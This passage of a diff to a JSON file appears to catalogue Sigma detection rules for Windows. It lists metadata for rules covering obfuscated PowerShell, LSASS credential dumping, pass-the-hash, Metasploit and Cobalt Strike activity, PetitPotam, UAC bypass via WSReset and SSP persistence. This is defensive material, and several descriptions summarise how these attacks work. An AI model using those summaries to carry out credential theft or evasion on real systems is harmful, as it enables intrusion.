"https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security" - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", - "value": "Invoke-Obfuscation STDIN+ Launcher - Security" - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - 
"attack.t1059.001" - ] - }, - "uuid": "dcf2db1f-f091-425b-a821-c05875b8925a", - "value": "Invoke-Obfuscation VAR+ Launcher - Security" - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "7a922f1b-2635-4d6c-91ef-af228b198ad3", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security" - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - Security" - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/12", - 
"falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "value": "Invoke-Obfuscation Via Stdin - Security" - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", - "value": "Invoke-Obfuscation Via Use Clip - Security" - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "value": "Invoke-Obfuscation Via Use MSHTA - Security" - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", - "value": "Invoke-Obfuscation Via Use Rundll32 - Security" - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "value": 
"Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security" - }, - { - "description": "Detects the mount of ISO images on an endpoint", - "meta": { - "author": "Syed Hasan (@syedhasan009)", - "creation_date": "2021/05/29", - "falsepositive": [ - "Software installation ISO files" - ], - "filename": "win_security_iso_mount.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", - "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", - "https://twitter.com/MsftSecIntel/status/1257324139515269121", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", - "value": "ISO Image Mount" - }, - { - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", - "falsepositive": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" - ], - "filename": "win_security_lm_namedpipe.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/menasec1/status/1104489274387451904", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", - "value": "First Time Seen Remote Named Pipe" - }, - { - "description": "The 
attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.", - "meta": { - "author": "Arun Chauhan", - "creation_date": "2021/10/04", - "falsepositive": [ - "Red team activity", - "Rare legitimate use by an administrator" - ], - "filename": "win_security_lolbas_execution_of_nltest.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", - "https://attack.mitre.org/software/S0359/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lolbas_execution_of_nltest.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482", - "attack.t1018", - "attack.t1016" - ] - }, - "uuid": "eeb66bbb-3dde-4582-815a-584aee9fe6d1", - "value": "Correct Execution of Nltest.exe" - }, - { - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_lsass_access_non_system_account.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "value": "LSASS Access from Non System Account" - }, - { - "description": "Detects well-known credential dumping tools execution via service execution events", - "meta": { - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2017/03/05", - 
"falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "filename": "win_security_mal_creddumper.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", "attack.s0005" ] }, - "uuid": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "value": "Credential Dumping Tools Service Execution - Security" + "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "value": "Windows Credential Editor Registry" }, { - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", + "description": "Detects the addition of a SSP to the registry. 
Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", "meta": { - "author": "Florian Roth, Daniil Yugoslavskiy, oscd.community (update)", - "creation_date": "2017/03/27", + "author": "iwillkeepwatch", + "creation_date": "2019/01/18", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "win_security_mal_service_installs.yml", + "filename": "registry_event_ssp_added_lsa_config.yml", "level": "critical", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://awakesecurity.com/blog/threat-hunting-for-paexec/", - "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", - "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml" + "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" ], "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1547.005" ] }, - "uuid": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "value": "Malicious Service Installations" + "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "value": "Security Support Provider (SSP) Added to LSA Configuration" }, { - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/14", + "author": "Aidan Bracher", + "creation_date": "2020/07/07", + "falsepositive": "No established falsepositives", + "filename": "registry_event_apt_leviathan.yml", + "level": 
"critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "70d43542-cd2d-483c-8f30-f16b436fd7db", + "value": "Leviathan Registry Key Activity" + }, + { + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "meta": { + "author": "megan201296, Jonhnathan Ribeiro", + "creation_date": "2019/04/14", "falsepositive": [ "Unknown" ], - "filename": "win_security_mal_wceaux_dll.yml", + "filename": "registry_event_apt_oceanlotus_registry.yml", "level": "critical", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml" + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.defense_evasion", + "attack.t1112" ] }, - "uuid": "1de68c67-af5c-4097-9c85-fe5578e09e67", - "value": "WCE wceaux.dll Access" + "uuid": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "value": "OceanLotus Registry Activity" }, { - "description": "Alerts on Metasploit host's authentications on the domain.", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", "meta": { - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", - "creation_date": "2020/05/06", + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/07", "falsepositive": [ - "Linux hostnames composed of 16 characters." + "Unknown" ], - "filename": "win_security_metasploit_authentication.yml", + "filename": "registry_event_bypass_via_wsreset.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_authentication.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "72124974-a68b-4366-b990-d30e0b2a190d", - "value": "Metasploit SMB Authentication" - }, - { - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "meta": { - "author": "Bartlomiej Czyz, Relativity", - "creation_date": "2021/01/21", - "falsepositive": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" - ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://bczyz1.github.io/2021/01/30/psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", - "value": "Metasploit 
Or Impacket Service Installation Via SMB PsExec" - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "meta": { - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "creation_date": "2019/10/26", - "falsepositive": [ - "Highly unlikely" - ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" ], "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1548.002" ] }, - "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security" + "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "value": "UAC Bypass Via Wsreset" }, { "description": "Detects NetNTLM downgrade attack", 
@@ -16308,13 +11345,13 @@ "falsepositive": [ "Unknown" ], - "filename": "win_security_net_ntlm_downgrade.yml", + "filename": "registry_event_net_ntlm_downgrade.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" ], "tags": [ "attack.defense_evasion", 
@@ -16322,2303 +11359,385 @@ "attack.t1112" ] }, - "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "value": "NetNTLM Downgrade Attack" + "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "value": "NetNTLM Downgrade Attack - Registry" }, { - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", "meta": { - "author": "Tim Shelton (HAWK.IO)", - "creation_date": "2021/12/06", - "falsepositive": [ - "Read only access list authority" - ], - "filename": "win_security_net_share_obj_susp_desktop_ini.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ] - }, - "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "value": "Windows Network Access Suspicious desktop.ini Action" - }, - { - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - 
}, - "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "value": "New or Renamed User Account with '$' in Attribute 'SamAccountName'" - }, - { - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "meta": { - "author": "Pushkarev Dmitry", - "creation_date": "2020/06/27", - "falsepositive": [ - "Valid user was not added to RDP group" - ], - "filename": "win_security_not_allowed_rdp_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.001" - ] - }, - "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", - "value": "Denied Access To Remote Desktop" - }, - { - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "meta": { - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", - "creation_date": "2018/02/12", - "falsepositive": [ - "Runas command-line tool using /netonly parameter" - ], - "filename": "win_security_overpass_the_hash.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" - ] - }, - "uuid": 
"192a0330-c20b-4356-90b6-7b7049ae0b87", - "value": "Successful Overpass the Hash Attempt" - }, - { - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "meta": { - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", - "creation_date": "2019/06/14", - "falsepositive": [ - "Administrator activity" - ], - "filename": "win_security_pass_the_hash_2.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", - "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", - "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ] - }, - "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "value": "Pass the Hash Activity 2" - }, - { - "description": "Detect PetitPotam coerced authentication activity.", - "meta": { - "author": "Mauricio Velazco, Michael Haag", - "creation_date": "2021/09/02", - "falsepositive": [ - "Unknown. Feedback welcomed." 
- ], - "filename": "win_security_petitpotam_network_share.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/topotam/PetitPotam", - "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1187" - ] - }, - "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "value": "Possible PetitPotam Coerce Authentication Attempt" - }, - { - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "meta": { - "author": "Mauricio Velazco, Michael Haag", - "creation_date": "2021/09/02", - "falsepositive": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
- ], - "filename": "win_security_petitpotam_susp_tgt_request.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/topotam/PetitPotam", - "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1187" - ] - }, - "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", - "value": "PetitPotam Suspicious Kerberos TGT Request" - }, - { - "description": "Detects DCShadow via create new SPN", - "meta": { - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", - "creation_date": "2019/10/25", - "falsepositive": [ - "Valid on domain controllers; exclude known DCs" - ], - "filename": "win_security_possible_dc_shadow.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml", - "https://twitter.com/gentilkiwi/status/1003236624925413376", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1207" - ] - }, - "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", - "value": "Possible DC Shadow Attack" - }, - { - "description": "Detects powershell script installed as a Service", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", - 
"falsepositive": [ - "Unknown" - ], - "filename": "win_security_powershell_script_installed_as_service.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", - "value": "PowerShell Scripts Installed as Services - Security" - }, - { - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/10", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_protected_storage_service_access.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", - "value": "Protected Storage Service Access" - }, - { - "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/03/23", - "falsepositive": [ - "Software installation", - "Software updates" - ], - "filename": "win_security_rare_schtasks_creations.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": 
"windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "car.2013-08-001", - "attack.t1053.005" - ] - }, - "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", - "value": "Rare Schtasks Creations" - }, - { - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "meta": { - "author": "Florian Roth (rule), Adam Bradbury (idea)", - "creation_date": "2019/06/02", + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/03/15", "falsepositive": [ "Unlikely" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", - "https://github.com/zerosum0x0/CVE-2019-0708", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ] - }, - "uuid": "8400629e-79a9-4737-b387-5db940ab2367", - "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln" - }, - { - "description": "RDP login with localhost source address may be a tunnelled login", - "meta": { - "author": "Thomas 